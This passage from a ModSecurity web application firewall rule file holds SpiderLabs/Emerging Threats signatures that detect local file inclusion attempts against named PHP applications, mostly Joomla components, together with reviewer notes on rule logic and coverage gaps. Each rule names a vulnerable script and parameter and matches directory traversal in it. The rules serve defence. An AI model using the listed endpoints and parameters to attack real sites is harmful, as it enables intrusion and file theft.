SecRule &TX:'/DIR_TRAVERSAL.*ARGS:API_HOME_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /includes/startmodules.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009652,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34538'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:lang_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008937) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion
# NOTE(review): same dependency as rule 2008878 above -- the last link only
# counts TX variables named /DIR_TRAVERSAL.*ARGS:objectname/ set by another rule.
SecRule REQUEST_LINE "@contains /library/setup/rpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008937,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7344'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:objectname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009231) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion
SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009231,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:c_temp_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt
# NOTE(review): the "option=com_jeajaxeventcalendar&" link includes the trailing
# '&', so it only matches when another parameter follows option in the request
# line -- confirm that is acceptable coverage for this component.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011140,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_jeajaxeventcalendar&" "chain"
SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008651) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion
# NOTE(review): the two chained links are the same test
# (&TX:'/DIR_TRAVERSAL.*ARGS:src/' "@gt 0"), so the second one adds nothing, and
# no link restricts the URI: the rule scores any request line containing "GET "
# whose `src` argument was already flagged by another rule. The title says
# "Multiple", so per-script URI conditions may have been lost when the signature
# was converted -- check against the upstream signature named in the url tag.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008651,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6669/'"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:src/' "@gt 0" "chain"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:src/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009508) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /windetail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009508,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009509) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009509,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion
# NOTE(review): the last link counts TX variables named
# /DIR_TRAVERSAL.*ARGS:include_file/; it relies on another rule (not in this
# section) having flagged the argument earlier in the same transaction.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008822,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6980/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_pro_desk" "chain"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:include_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt
# NOTE(review): unlike the neighbouring rules, this chain never tests an argument
# value. It matches any argument whose NAME contains "target" (case-insensitive,
# unanchored) on a request line containing "/index.php?option=com_album&" and
# "Itemid=128&", and has no method link. It therefore adds the critical score on
# a parameter name alone, and only when option directly follows '?' and Itemid is
# 128 followed by '&' -- review both the false-positive and the coverage side.
SecRule ARGS_NAMES "(?i:target)" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009929,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9706/'"
SecRule REQUEST_LINE "@contains /index.php?option=com_album&" "chain"
SecRule REQUEST_LINE "@contains Itemid=128&" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /components/com_moofaq/includes/file_includer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009934,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8898/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010780) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_mediaslide/viewer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010780,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37440'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mediaslide component viewer.php path Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010833) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_intuit/models/intuit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010833,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10730'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:approval "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla intuit component intuit.php approval Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010942) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt
# NOTE(review): "option=com_jcollection&" includes the trailing '&', so this link
# only matches when another parameter follows option in the request line. Rules
# 2010996 below uses the same form; rule 2008822 above matches
# "option=com_pro_desk" without the '&'. Pick one convention deliberately.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010942,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11088'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_jcollection&" "chain"
SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jcollection controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010989) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt
# NOTE(review): here the "GET " test is the chain starter and the URI link is
# "/index.php?option=com_ccnewsletter&", which additionally requires option to be
# the first query parameter.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010989,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37987'"
SecRule REQUEST_LINE "@contains /index.php?option=com_ccnewsletter&" "chain"
SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_ccnewsletter controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010996,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/11511'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_communitypolls&" "chain"
SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_communitypolls controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2011067) 
SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt
# NOTE(review): "option=com_wgpicasa&" includes the trailing '&', so that link
# only matches when another parameter follows option in the request line --
# confirm that is acceptable coverage for this component.
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011067,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains option=com_wgpicasa&" "chain"
SecRule ARGS:controller "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla wgPicasa Component controller Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009383) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion
# NOTE(review): t:urlDecodeUni, t:htmlEntityDecode and t:normalisePathWin are
# listed on the chain starter, i.e. next to the REQUEST_LINE test. The ARGS:...
# link has no t: actions of its own; as far as I know a chained rule takes its
# transformations from its own action list or SecDefaultAction, so confirm with
# the regression tests which normalisation the "@contains ../" test really sees.
# The other ARGS-based rules in this section are built the same way.
SecRule REQUEST_LINE "@contains /config.dadamail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009383,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7002/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:GLOBALS[mosConfig_absolute_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Dada Mail Manager Component config.dadamail.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009761) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /include/unverified.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009761,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5179/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:template "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LWS php User Base unverified.inc.php template Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010023) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /locms/smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010023,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9015/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:cwd "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightOpenCMS smarty.php cwd Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion
# NOTE(review): the last link does not inspect ARGS:reflect_base directly. It
# counts TX variables whose name matches /DIR_TRAVERSAL.*ARGS:reflect_base/, so it
# depends on another rule (not in this section; presumably the generic
# directory-traversal rule -- confirm) having flagged that argument earlier in the
# same transaction.
SecRule REQUEST_LINE "@contains /snippet.reflect.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008898,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7204/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:reflect_base/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MODx CMS snippet.reflect.php reflect_base Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009437,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:dirn "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php dirn Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /viewsource.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009430,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28659'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:fname "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mole viewsource.php fname Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2008938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion
# NOTE(review): same dependency as rule 2008898 above -- the last link only
# counts TX variables named /DIR_TRAVERSAL.*ARGS:pfad/ set by another rule.
SecRule REQUEST_LINE "@contains /include/global.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule &TX:'/DIR_TRAVERSAL.*ARGS:pfad/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Multi SEO phpBB pfad parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009330) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /centre.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009330,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6846/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:padmin "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2010631) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /infusions/last_seen_users_panel/last_seen_users_panel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010631,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9018/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:settings[locale] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009905) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /forum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009905,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8841/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule ARGS:GLOBALS[UTE][__tplCollection][a][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains /news_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009431,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5429/'"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule 
ARGS:newsoffice_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

# (2009728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion
# Four-link chain: the request line must contain "/config.php", "GET " and
# "newlang=kacper", and the argument languages[kacper][file] must contain "../".
# On a full match the rule adds the critical anomaly score and records a
# WEB_ATTACK/LFI TX variable named after the matched argument.
# NOTE(review): both the request-line literal and the argument name are tied to
# the single key "kacper", so this signature only covers requests that use that
# exact key; treat it as a narrow signature and confirm the generic traversal
# rules cover the same parameter.
# NOTE(review): the t: transformations are listed only on the chain starter;
# confirm which transformations the chained ARGS check runs with in the deployed
# ModSecurity version, since "@contains ../" is a literal comparison.
SecRule REQUEST_LINE "@contains /config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009728,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34636'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains newlang=kacper" "chain"
    SecRule ARGS:languages[kacper][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'"

